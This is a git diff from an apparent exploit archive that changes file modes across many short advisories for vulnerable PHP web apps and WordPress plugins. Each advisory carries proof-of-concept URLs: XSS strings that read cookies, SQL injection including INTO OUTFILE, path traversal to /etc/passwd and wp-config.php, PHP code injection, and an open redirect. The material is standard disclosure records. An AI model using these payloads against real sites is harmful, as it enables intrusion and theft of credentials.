b/platforms/php/webapps/38410.txt old mode 100755 new mode 100644 index 715749eab..a5a26a90a --- a/platforms/php/webapps/38410.txt +++ b/platforms/php/webapps/38410.txt @@ -4,4 +4,4 @@ The Banners Lite plugin for WordPress is prone to an HTML-injection vulnerabilit Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. -http://www.example.com/wordpress/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=1&cid=a_<script>alert(/XSSProof-of-Concept/)</script> \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=1&cid=a_<script>alert(/XSSProof-of-Concept/)</script> \ No newline at end of file diff --git a/platforms/php/webapps/38413.txt b/platforms/php/webapps/38413.txt old mode 100755 new mode 100644 index 6bab1be09..024809af2 --- a/platforms/php/webapps/38413.txt +++ b/platforms/php/webapps/38413.txt @@ -5,4 +5,4 @@ OrionDB Web Directory is prone to multiple cross-site scripting vulnerabilities An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/wd-demo/index.php?c=<script >prompt(35)</script> -http://www.example.com/wd-demo/index.php?c=search&category=Food&searchtext=1</title><h1>3spi0n</h1><script >prompt(35)</script> \ No newline at end of file +http://www.example.com/wd-demo/index.php?c=search&category=Food&searchtext=1</title><h1>3spi0n</h1><script >prompt(35)</script> \ No newline at end of file diff --git a/platforms/php/webapps/38414.txt b/platforms/php/webapps/38414.txt old mode 100755 new mode 100644 index 312b0808c..dcba3221e --- a/platforms/php/webapps/38414.txt +++ b/platforms/php/webapps/38414.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Feedweb 1.8.8 and prior versions are vulnerable. - http://www.example.com/wordpress/wp-content/plugins/feedweb/widget_remove.php?wp_post_id=[XSS] \ No newline at end of file + http://www.example.com/wordpress/wp-content/plugins/feedweb/widget_remove.php?wp_post_id=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/38416.txt b/platforms/php/webapps/38416.txt old mode 100755 new mode 100644 index a23fd085e..f74d41455 --- a/platforms/php/webapps/38416.txt +++ b/platforms/php/webapps/38416.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow e107 1.0.2 is vulnerable; other versions may also be affected. -http://www.example.com/e107_plugins/content/handlers/content_preset.php? %3c%00script%0d%0a>alert('reflexted%20XSS')</script> \ No newline at end of file +http://www.example.com/e107_plugins/content/handlers/content_preset.php? %3c%00script%0d%0a>alert('reflexted%20XSS')</script> \ No newline at end of file diff --git a/platforms/php/webapps/38417.txt b/platforms/php/webapps/38417.txt old mode 100755 new mode 100644 index 6f382bd2d..e825cb362 --- a/platforms/php/webapps/38417.txt +++ b/platforms/php/webapps/38417.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Symphony 2.3.1 is vulnerable; other versions may also be affected. -http://www.example.com/symphony/system/authors/?order=asc&sort=id%20INTO%20OUTFILE%20%27/var/www/file.txt%27%20--%20 \ No newline at end of file +http://www.example.com/symphony/system/authors/?order=asc&sort=id%20INTO%20OUTFILE%20%27/var/www/file.txt%27%20--%20 \ No newline at end of file diff --git a/platforms/php/webapps/38418.txt b/platforms/php/webapps/38418.txt old mode 100755 new mode 100644 index f58e4cffa..c7d9c9c67 --- a/platforms/php/webapps/38418.txt +++ b/platforms/php/webapps/38418.txt @@ -13,4 +13,4 @@ Cookie: fud_session_1361275607=11703687e05757acb08bb3891f5b2f8d Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 111 -SQ=8928823a5edf50cc642792c2fa4d8863&rpl_replace_opt=0&btn_submit=Add&btn_regex=1&edit=&regex_ str=(.*)&regex_str_opt=e&regex_with=phpinfo() \ No newline at end of file +SQ=8928823a5edf50cc642792c2fa4d8863&rpl_replace_opt=0&btn_submit=Add&btn_regex=1&edit=&regex_ str=(.*)&regex_str_opt=e&regex_with=phpinfo() \ No newline at end of file diff --git a/platforms/php/webapps/3842.txt b/platforms/php/webapps/3842.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38425.txt b/platforms/php/webapps/38425.txt old mode 100755 new mode 100644 index 0c84d2beb..3c714a7bf --- a/platforms/php/webapps/38425.txt +++ b/platforms/php/webapps/38425.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. -http://www.example.com/addressbook/register/delete_user.php?id={insert} \ No newline at end of file +http://www.example.com/addressbook/register/delete_user.php?id={insert} \ No newline at end of file diff --git a/platforms/php/webapps/38426.txt b/platforms/php/webapps/38426.txt old mode 100755 new mode 100644 index 7ddbc7dbf..43234a0be --- a/platforms/php/webapps/38426.txt +++ b/platforms/php/webapps/38426.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. -http://www.example.com/addressbook/register/edit_user.php?id={insert} \ No newline at end of file +http://www.example.com/addressbook/register/edit_user.php?id={insert} \ No newline at end of file diff --git a/platforms/php/webapps/38427.txt b/platforms/php/webapps/38427.txt old mode 100755 new mode 100644 index 27e237c77..c76b84d15 --- a/platforms/php/webapps/38427.txt +++ b/platforms/php/webapps/38427.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. -http://www.example.com/addressbook/register/edit_user_save.php?id={insert}&lastname={insert}&firstname={insert}&phone={insert}&email={insert}&permissions={insert}&notes={insert} \ No newline at end of file +http://www.example.com/addressbook/register/edit_user_save.php?id={insert}&lastname={insert}&firstname={insert}&phone={insert}&email={insert}&permissions={insert}&notes={insert} \ No newline at end of file diff --git a/platforms/php/webapps/38428.txt b/platforms/php/webapps/38428.txt old mode 100755 new mode 100644 index 7d80431bd..fa6bad716 --- a/platforms/php/webapps/38428.txt +++ b/platforms/php/webapps/38428.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. -http://www.example.com/addressbook/register/linktick.php?site={insert} \ No newline at end of file +http://www.example.com/addressbook/register/linktick.php?site={insert} \ No newline at end of file diff --git a/platforms/php/webapps/38429.txt b/platforms/php/webapps/38429.txt old mode 100755 new mode 100644 index 04e69c73f..5f002fcd2 --- a/platforms/php/webapps/38429.txt +++ b/platforms/php/webapps/38429.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. -http://www.example.com/addressbook/register/reset_password.php?email={insert}&password={insert} \ No newline at end of file +http://www.example.com/addressbook/register/reset_password.php?email={insert}&password={insert} \ No newline at end of file diff --git a/platforms/php/webapps/3843.txt b/platforms/php/webapps/3843.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38430.txt b/platforms/php/webapps/38430.txt old mode 100755 new mode 100644 index 04647b4f2..f5c6900bc --- a/platforms/php/webapps/38430.txt +++ b/platforms/php/webapps/38430.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. -http://www.example.com/addressbook/register/reset_password_save.php?username={insert}&password=&password_confirm=&password_hint={insert}&email={insert} \ No newline at end of file +http://www.example.com/addressbook/register/reset_password_save.php?username={insert}&password=&password_confirm=&password_hint={insert}&email={insert} \ No newline at end of file diff --git a/platforms/php/webapps/38431.txt b/platforms/php/webapps/38431.txt old mode 100755 new mode 100644 index 743a7e8b5..e68a5832c --- a/platforms/php/webapps/38431.txt +++ b/platforms/php/webapps/38431.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. -http://www.example.com/addressbook/register/router.php COOKIE var BasicLogin \ No newline at end of file +http://www.example.com/addressbook/register/router.php COOKIE var BasicLogin \ No newline at end of file diff --git a/platforms/php/webapps/38432.txt b/platforms/php/webapps/38432.txt old mode 100755 new mode 100644 index 3db6313df..fda2bf30b --- a/platforms/php/webapps/38432.txt +++ b/platforms/php/webapps/38432.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. -http://www.example.com/addressbook/register/traffic.php?var={insert} \ No newline at end of file +http://www.example.com/addressbook/register/traffic.php?var={insert} \ No newline at end of file diff --git a/platforms/php/webapps/38433.txt b/platforms/php/webapps/38433.txt old mode 100755 new mode 100644 index 4f0f4b437..0f79f2fe4 --- a/platforms/php/webapps/38433.txt +++ b/platforms/php/webapps/38433.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. -http://www.example.com/addressbook/register/user_add_save.php POST var email \ No newline at end of file +http://www.example.com/addressbook/register/user_add_save.php POST var email \ No newline at end of file diff --git a/platforms/php/webapps/38434.txt b/platforms/php/webapps/38434.txt old mode 100755 new mode 100644 index 64de207d0..4db76f3e1 --- a/platforms/php/webapps/38434.txt +++ b/platforms/php/webapps/38434.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. -http://www.example.com/addressbook/register/checklogin.php?username={insert}&password=pass \ No newline at end of file +http://www.example.com/addressbook/register/checklogin.php?username={insert}&password=pass \ No newline at end of file diff --git a/platforms/php/webapps/38435.txt b/platforms/php/webapps/38435.txt old mode 100755 new mode 100644 index 521734c72..4616263ac --- a/platforms/php/webapps/38435.txt +++ b/platforms/php/webapps/38435.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. -http://www.example.com/addressbook/register/admin_index.php?q={insert} \ No newline at end of file +http://www.example.com/addressbook/register/admin_index.php?q={insert} \ No newline at end of file diff --git a/platforms/php/webapps/38436.txt b/platforms/php/webapps/38436.txt old mode 100755 new mode 100644 index 45b1ddae9..f687e1eed --- a/platforms/php/webapps/38436.txt +++ b/platforms/php/webapps/38436.txt @@ -4,4 +4,4 @@ Zimbra is prone to a cross-site scripting vulnerability because it fails to suff An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/aspell.php?disctionnary=&gt;<script>alert('foo');</script> \ No newline at end of file +http://www.example.com/aspell.php?disctionnary=&gt;<script>alert('foo');</script> \ No newline at end of file diff --git a/platforms/php/webapps/38438.txt b/platforms/php/webapps/38438.txt old mode 100755 new mode 100644 index 48c8754a2..87c9bc6eb --- a/platforms/php/webapps/38438.txt +++ b/platforms/php/webapps/38438.txt @@ -8,4 +8,4 @@ EasyPHP 12.1 is vulnerable; other versions may also be affected. http://www.example.com/home/index.php?to=ext -http://www.example.com/home/index.php?to=phpinfo \ No newline at end of file +http://www.example.com/home/index.php?to=phpinfo \ No newline at end of file diff --git a/platforms/php/webapps/38439.txt b/platforms/php/webapps/38439.txt old mode 100755 new mode 100644 index 8548fcaa4..2202be2f7 --- a/platforms/php/webapps/38439.txt +++ b/platforms/php/webapps/38439.txt @@ -4,4 +4,4 @@ The Traffic Analyzer plugin for WordPress is prone to a cross-site scripting vul An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[Xss] \ No newline at end of file +http://www.example.com/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[Xss] \ No newline at end of file diff --git a/platforms/php/webapps/38440.txt b/platforms/php/webapps/38440.txt old mode 100755 new mode 100644 index ec183baef..935345eea --- a/platforms/php/webapps/38440.txt +++ b/platforms/php/webapps/38440.txt @@ -8,4 +8,4 @@ phpMyAdmin 3.5.0 through versions 3.5.7 are vulnerable. http://www.example.com/PMA/tbl_gis_visualization.php?db=information_schema&token=17961b7ab247b6d2b39d730bf336cebb&visualizationSettings[width]="><script>alert(123);</script> -http://www.example.com/PMA/tbl_gis_visualization.php?db=information_schema&token=17961b7ab247b6d2b39d730bf336cebb&visualizationSettings[height]="><script>alert(123);</script> \ No newline at end of file +http://www.example.com/PMA/tbl_gis_visualization.php?db=information_schema&token=17961b7ab247b6d2b39d730bf336cebb&visualizationSettings[height]="><script>alert(123);</script> \ No newline at end of file diff --git a/platforms/php/webapps/38441.txt b/platforms/php/webapps/38441.txt old mode 100755 new mode 100644 index 1f5614242..bf7b12369 --- a/platforms/php/webapps/38441.txt +++ b/platforms/php/webapps/38441.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Spiffy XSPF Player 0.1 is vulnerable; other versions may also be affected. -http://www.example.com/wp-content/plugins/spiffy/playlist.php?playlist_id=[SQL] \ No newline at end of file +http://www.example.com/wp-content/plugins/spiffy/playlist.php?playlist_id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/38443.txt b/platforms/php/webapps/38443.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38445.txt b/platforms/php/webapps/38445.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38446.html b/platforms/php/webapps/38446.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38450.txt b/platforms/php/webapps/38450.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38458.txt b/platforms/php/webapps/38458.txt old mode 100755 new mode 100644 index 5b8790f71..12c0fe31e --- a/platforms/php/webapps/38458.txt +++ b/platforms/php/webapps/38458.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Spider Video Player 2.1 is vulnerable; other versions may also be affected. -http://www.example.com/wp-content/plugins/player/settings.php?playlist=[num]&theme=[SQL] \ No newline at end of file +http://www.example.com/wp-content/plugins/player/settings.php?playlist=[num]&theme=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/38459.txt b/platforms/php/webapps/38459.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3846.txt b/platforms/php/webapps/3846.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3847.txt b/platforms/php/webapps/3847.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38476.txt b/platforms/php/webapps/38476.txt old mode 100755 new mode 100644 index 3d59dc875..0ee349952 --- a/platforms/php/webapps/38476.txt +++ b/platforms/php/webapps/38476.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica Todoo Forum 2.0 is vulnerable; other versions may also be affected. http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post='"--></style></script><script>alert(0x0000)</script>&pg=1 -http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=2&pg='"--></style></script><script>alert(0x0000)</script> \ No newline at end of file +http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=2&pg='"--></style></script><script>alert(0x0000)</script> \ No newline at end of file diff --git a/platforms/php/webapps/38477.txt b/platforms/php/webapps/38477.txt old mode 100755 new mode 100644 index bac6e7e4d..859c1ffdb --- a/platforms/php/webapps/38477.txt +++ b/platforms/php/webapps/38477.txt @@ -7,5 +7,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica Todoo Forum 2.0 is vulnerable; other versions may also be affected. http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=[Inject_here]&pg=1 -http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=1&pg=[Inject_Here] - \ No newline at end of file +http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=1&pg=[Inject_Here] \ No newline at end of file diff --git a/platforms/php/webapps/38478.txt b/platforms/php/webapps/38478.txt old mode 100755 new mode 100644 index 7450f7c83..86f6f3b48 --- a/platforms/php/webapps/38478.txt +++ b/platforms/php/webapps/38478.txt @@ -10,4 +10,4 @@ Sosci Survey is prone to following security vulnerabilities: Successful exploits may allow an attacker to gain unauthorized access to the affected application, allow attacker-supplied HTML and script code to run in the context of the affected browser, allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or inject and execute arbitrary malicious PHP code in the context of the web server process. https://www.example.com/admin/index.php?o=account&a=message.reply&id=[msg_id] -https://www.example.com/admin/index.php?o=panel&a=receiver.edit&id=<script>alert(document.cookie)</script> \ No newline at end of file +https://www.example.com/admin/index.php?o=panel&a=receiver.edit&id=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/3848.txt b/platforms/php/webapps/3848.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38480.txt b/platforms/php/webapps/38480.txt old mode 100755 new mode 100644 index 6f09c6788..e95aa57bc --- a/platforms/php/webapps/38480.txt +++ b/platforms/php/webapps/38480.txt @@ -4,4 +4,4 @@ Fork CMS is prone to a local file-include vulnerability because it fails to suff An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks. -http://www.example.com/frontend/js.php?module=core&file=../../../../../../../../../../../../../../../../etc/passwd&language=en&m=1339527371 \ No newline at end of file +http://www.example.com/frontend/js.php?module=core&file=../../../../../../../../../../../../../../../../etc/passwd&language=en&m=1339527371 \ No newline at end of file diff --git a/platforms/php/webapps/38482.txt b/platforms/php/webapps/38482.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38487.txt b/platforms/php/webapps/38487.txt old mode 100755 new mode 100644 index c01814397..f696f6f3d --- a/platforms/php/webapps/38487.txt +++ b/platforms/php/webapps/38487.txt @@ -20,4 +20,4 @@ http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.sw Cross-site scripting: -http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B \ No newline at end of file +http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B \ No newline at end of file diff --git a/platforms/php/webapps/3849.txt b/platforms/php/webapps/3849.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38491.php b/platforms/php/webapps/38491.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38494.txt b/platforms/php/webapps/38494.txt old mode 100755 new mode 100644 index 8d14f758f..e4f57bcce --- a/platforms/php/webapps/38494.txt +++ b/platforms/php/webapps/38494.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary PHP code within the cont WP Super Cache 1.2 is vulnerable; other versions may also be affected. -<!?mfunc echo PHP_VERSION; ?><!?/mfunc?> \ No newline at end of file +<!?mfunc echo PHP_VERSION; ?><!?/mfunc?> \ No newline at end of file diff --git a/platforms/php/webapps/38496.txt b/platforms/php/webapps/38496.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38497.txt b/platforms/php/webapps/38497.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38499.html b/platforms/php/webapps/38499.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3850.php b/platforms/php/webapps/3850.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38506.txt b/platforms/php/webapps/38506.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38507.txt b/platforms/php/webapps/38507.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38508.txt b/platforms/php/webapps/38508.txt old mode 100755 new mode 100644 index 0c907e0ea..ce39eb7b0 --- a/platforms/php/webapps/38508.txt +++ b/platforms/php/webapps/38508.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Versions prior to Game Section 1.2.2 are vulnerable. -http://www.example.com/games.php?des=%27%22%3E%3E%3Cscript%3Ealert%28%27+by+Darksnipper%27%29%3C%2Fscript%3E \ No newline at end of file +http://www.example.com/games.php?des=%27%22%3E%3E%3Cscript%3Ealert%28%27+by+Darksnipper%27%29%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/38509.txt b/platforms/php/webapps/38509.txt old mode 100755 new mode 100644 index 9407531ca..a4ded20d2 --- a/platforms/php/webapps/38509.txt +++ b/platforms/php/webapps/38509.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Securimage 3.5 is vulnerable; other versions may also be affected. -http://www.example.com/securimage/example_form.php/"/><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/securimage/example_form.php/"/><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/38510.txt b/platforms/php/webapps/38510.txt old mode 100755 new mode 100644 index 7fdb5f3e8..9934ff3ad --- a/platforms/php/webapps/38510.txt +++ b/platforms/php/webapps/38510.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Securimage-WP 3.2.4 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/securimage-wp/siwp_test.php/"/><script>alert(document.cookie);</script>?tested=1 \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/securimage-wp/siwp_test.php/"/><script>alert(document.cookie);</script>?tested=1 \ No newline at end of file diff --git a/platforms/php/webapps/38511.txt b/platforms/php/webapps/38511.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38515.txt b/platforms/php/webapps/38515.txt old mode 100755 new mode 100644 index b4529d470..a965369a1 --- a/platforms/php/webapps/38515.txt +++ b/platforms/php/webapps/38515.txt @@ -4,4 +4,4 @@ The wp-FileManager plugin for WordPress is prone to a vulnerability that lets at An attacker can exploit this issue to download arbitrary files within the context of the web server process. Information obtained may aid in further attacks. -http://www.example.com/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download \ No newline at end of file +http://www.example.com/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download \ No newline at end of file diff --git a/platforms/php/webapps/38516.txt b/platforms/php/webapps/38516.txt old mode 100755 new mode 100644 index 1e2d6206b..d63b115a4 --- a/platforms/php/webapps/38516.txt +++ b/platforms/php/webapps/38516.txt @@ -4,4 +4,4 @@ Open Flash Chart is prone to a cross-site scripting vulnerability because it fai An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://ww.example.com/joomla/components/com_jnews/includes/openflashchart/open-flash-chart.swf?get-data=(function(){alert(document.cookie)})() \ No newline at end of file +http://ww.example.com/joomla/components/com_jnews/includes/openflashchart/open-flash-chart.swf?get-data=(function(){alert(document.cookie)})() \ No newline at end of file diff --git a/platforms/php/webapps/38517.html b/platforms/php/webapps/38517.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38518.txt b/platforms/php/webapps/38518.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38519.txt b/platforms/php/webapps/38519.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3852.txt b/platforms/php/webapps/3852.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38520.html b/platforms/php/webapps/38520.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38523.txt b/platforms/php/webapps/38523.txt old mode 100755 new mode 100644 index 6f967fad9..5e51d5a01 --- a/platforms/php/webapps/38523.txt +++ b/platforms/php/webapps/38523.txt @@ -8,4 +8,4 @@ http://www.example.com/fullstory.php?id=-999 union all select 1,2,version(),user http://www.example.com/fullstory.php?id=-999 UNION SELECT 1,2,version(),database(),5,6,7,8,9,10,11,12,13,14 -http://www.example.com/countrys.php?countryid=-999 union all select 1,version(),database() \ No newline at end of file +http://www.example.com/countrys.php?countryid=-999 union all select 1,version(),database() \ No newline at end of file diff --git a/platforms/php/webapps/38525.txt b/platforms/php/webapps/38525.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38527.txt b/platforms/php/webapps/38527.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38528.txt b/platforms/php/webapps/38528.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3853.txt b/platforms/php/webapps/3853.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38534.php b/platforms/php/webapps/38534.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38537.txt b/platforms/php/webapps/38537.txt old mode 100755 new mode 100644 index cab425356..3722d0ec2 --- a/platforms/php/webapps/38537.txt +++ b/platforms/php/webapps/38537.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow ADIF Log Search 1.0e is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E<http://www.example2.com/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E> \ No newline at end of file +http://www.example.com/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E<http://www.example2.com/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E> \ No newline at end of file diff --git a/platforms/php/webapps/3854.txt b/platforms/php/webapps/3854.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38543.txt b/platforms/php/webapps/38543.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38544.txt b/platforms/php/webapps/38544.txt old mode 100755 new mode 100644 index a34f157c6..4448a291e --- a/platforms/php/webapps/38544.txt +++ b/platforms/php/webapps/38544.txt @@ -5,4 +5,4 @@ Elastix is prone to multiple cross-site scripting vulnerabilities because it fai An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. https://www.example.com/libs/jpgraph/Examples/bar_csimex3.php/"><IMg srC= x OnerRoR = alert(1337)> -https://www.example.comlibs/magpierss/scripts/magpie_simple.php?url="><IMg+srC%3D+x+OnerRoR+%3D+alert(1337)> \ No newline at end of file +https://www.example.comlibs/magpierss/scripts/magpie_simple.php?url="><IMg+srC%3D+x+OnerRoR+%3D+alert(1337)> \ No newline at end of file diff --git a/platforms/php/webapps/38545.txt b/platforms/php/webapps/38545.txt old mode 100755 new mode 100644 index 60e521b6c..4514b8b23 --- a/platforms/php/webapps/38545.txt +++ b/platforms/php/webapps/38545.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Versions prior to Telaen 1.3.1 are vulnerable. -http://www.example.com/telaen/index.php?tid=default&lid=en_UK&f_email="><script>alert("XSS")</script> \ No newline at end of file +http://www.example.com/telaen/index.php?tid=default&lid=en_UK&f_email="><script>alert("XSS")</script> \ No newline at end of file diff --git a/platforms/php/webapps/38546.txt b/platforms/php/webapps/38546.txt old mode 100755 new mode 100644 index 3273155b1..3d080d92c --- a/platforms/php/webapps/38546.txt +++ b/platforms/php/webapps/38546.txt @@ -6,4 +6,4 @@ An attacker can leverage this issue by constructing a crafted URI and enticing a Versions prior to Telaen 1.3.1 are vulnerable. -http://www.example.com/telaen/redir.php?http://www.malicious-site.com \ No newline at end of file +http://www.example.com/telaen/redir.php?http://www.malicious-site.com \ No newline at end of file diff --git a/platforms/php/webapps/38547.txt b/platforms/php/webapps/38547.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38548.txt b/platforms/php/webapps/38548.txt old mode 100755 new mode 100644 index b66ca1761..f9b871b2c --- a/platforms/php/webapps/38548.txt +++ b/platforms/php/webapps/38548.txt @@ -6,4 +6,4 @@ Successful exploits will allow attackers to obtain sensitive information that ma Versions prior to Telaen 1.3.1 are vulnerable. -hhtp://www.example.com//telaen/inc/init.php \ No newline at end of file +hhtp://www.example.com//telaen/inc/init.php \ No newline at end of file diff --git a/platforms/php/webapps/3855.php b/platforms/php/webapps/3855.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38560.txt b/platforms/php/webapps/38560.txt old mode 100755 new mode 100644 index 9b4b98270..7cd45d937 --- a/platforms/php/webapps/38560.txt +++ b/platforms/php/webapps/38560.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Resin Professional 4.0.36 is vulnerable; other versions may also be affected. -http://www.example.com/resin-admin\?%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E \ No newline at end of file +http://www.example.com/resin-admin\?%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/38561.txt b/platforms/php/webapps/38561.txt old mode 100755 new mode 100644 index 685d9463d..9c1022175 --- a/platforms/php/webapps/38561.txt +++ b/platforms/php/webapps/38561.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Resin Professional 4.0.36 is vulnerable; other versions may also be affected. -http://www.example.com/resin-admin/?q=index.php&logout=true%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file +http://www.example.com/resin-admin/?q=index.php&logout=true%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/38562.txt b/platforms/php/webapps/38562.txt old mode 100755 new mode 100644 index f44434c50..9d753ae01 --- a/platforms/php/webapps/38562.txt +++ b/platforms/php/webapps/38562.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to inject and execute arbitrary code HP Insight Diagnostics 9.4.0.4710 is vulnerable; other versions may also be affected. 